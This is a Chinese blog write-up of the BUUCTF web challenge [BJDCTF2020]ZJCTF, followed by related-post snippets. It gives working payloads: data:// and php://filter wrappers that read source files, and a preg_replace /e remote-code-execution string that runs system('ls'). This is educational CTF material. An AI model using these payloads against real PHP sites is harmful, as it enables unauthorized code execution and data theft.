web buuctf [BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2023-11-20 09:49:45 发布
最新推荐文章于 2023-11-20 09:49:45 发布
阅读量1.9k 收藏 2
点赞数
文章标签: preg_re /e漏洞 正则匹配 php伪协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123695342
版权

考点:正则匹配;

正则-反向引用;

preg_replace /e模式漏洞

1.

一路做buuctf下来,

web buuctf [ZJCTF 2019]NiZhuanSiWei1_半杯雨水敬过客的博客-CSDN博客

和这题的思路一样,不做赘述,主要是利用php伪协议

1.令text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=(I have a dream的base64加密)

    file=php://filter/read=convert.base64-encode/resource=next.php

查看到next.php的源码(经过base64解码):

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

2.查看源代码,用到了preg_replace /e模式的漏洞

Preg_Replace代码执行漏洞解析-CE安全网前言icon-default.png?t=M276https://www.cesafe.com/html/6999.html上面的链接具体讲了这个漏洞,其实主要是对代码

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',  // /e模式,可以将里面的代码作为命令进行执行,结合题目,调用 
                              // getFlag()函数
        'strtolower("\\1")',  //反向引用,\\1转义后伪\1,反向引用会建立缓冲匹配池
        $str
    );
}

   令next.php?\S*=${getFlag()}&cmd=system('ls');

 

 

 

半杯雨水敬过客
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF部分web题目
05-06
写题记录
[BJDCTF2020]ZJCTF不过如此
05-07 340
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2235
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BUUCTF][BJDCTF2020]ZJCTF不过如此1(做题记录
qq_48597181的博客
04-05 657
作为正则表达式匹配条件的参数名且这个参数值为的"getFlag();参数名:cmd和需要php执行的代码所以构造id=1&\S*={${getFlag()}}&cmd=system('linux命令');PS:\S是什么意思?正则表达式\S匹配非空字符PS: 为什么用{${getFlag()}} 这个写法?会调用phpinfo()函数并试图将结果嵌入到字符串中。而如果使用phpinfo()函数,它不会自动嵌入到字符串中。(我在这试了好久TAT。
BUUCTF- ZJCTF不过如此题目解析
2201_75327657的博客
03-29 188
发现有preg——replace说明有代码执行问题。源码中的\\1实际等于\1本身的\1有其他意思。打开查看源码查看有file说明是伪协议。preg——replace相关链接(得到base64编码解析出来为。那就利用filter查看。
BUUCTF WEB ZJCTF,不过如此1
qq_41696858的博客
12-11 534
上来就给源码,很直接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; i
2020年最新web寄生虫程序.zip
09-04
2020年最新web寄生虫程序,最新程序 泛目录,远程调用,SEO霸屏 站群最好程序 百度 搜狗 360 各大搜索引擎快速收录引蜘蛛爬行
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
InterlliJ IDEA2020新建java web项目找不到Static Web的解决
09-07
主要介绍了InterlliJ IDEA2020新建java web项目找不到Static Web的解决,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
BUUCTF [web专项39][BJDCTF2020]ZJCTF不过如此
最新发布
yanglinchiji的博客
11-20 220
这里的 `$pattern` 是一个正则表达式字符串,用于指定搜索的模式, `$replacement` 是替换成的字符串, `$subject` 是要搜索和替换的原始字符串或字符串数组。在 PHP 中,`preg_replace` 是一个强大的正则表达式替换函数。它可以在一个字符串中使用正则表达式搜索和替换指定的文本。`preg_replace` 函数返回一个替换后的字符串或数组。作为正则表达式匹配条件的参数名 且 这个参数值为的"getFlag();( 开始定义一个捕获分组,并匹配其中的子表达式;
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2631
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
ctf之php漏洞,ctf入门到Thinkphp2.x、3.0-3.1版代码执行漏洞分析
weixin_39738380的博客
04-01 679
前言:文章可能有点长,小弟不才,只能靠刷ctf来理解一些内容。若有不恰当之处,望大佬们不吝赐教。一、[BJDCTF2020]ZJCTF先做一道ctf压压惊:[BJDCTF2020]ZJCTF构建以下payload,进入if判断,并且进入include()函数?text=data://text/plain,I have a dream&file=php://filter/convert.ba...
[BUUCTF][BJDCTF2020]ZJCTF不过如此
cosmoslin的博客
01-24 720
考点 代码审计 命令执行 解题 打开环境 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&
BUUCTF [BJDCTF2020] ZJCTF不过如此
Senimo
12-10 495
BUUCTF [BJDCTF2020] ZJCTF不过如此 考点: php伪协议读取源码 函数preg_replace()在\e模式下,存在代码执行漏洞 对于传入的非法的$_GET数组参数名,会将其转换成下划线_ 启动环境,给出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
BUUCTF-ZJCTF不过如此
m0_47571887的博客
11-29 2470
打开题目,代码审计的题,审计一下代码,我们提交text函数,并且打开后的内容要与I have a dream一致,才能执行file函数 看到有一个next.php,自然想到用php伪协议读取他 payload:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 解码审计一下 <?php $id = $_GET['id'..
buuctf-不过如此
bin789456的博客
02-02 2023
WP 这个题利用了preg的命令执行,没怎么遇到过,记录一下。 首先代码审计: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."&
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此
weixin_44622228的博客
04-20 1909
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 560
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值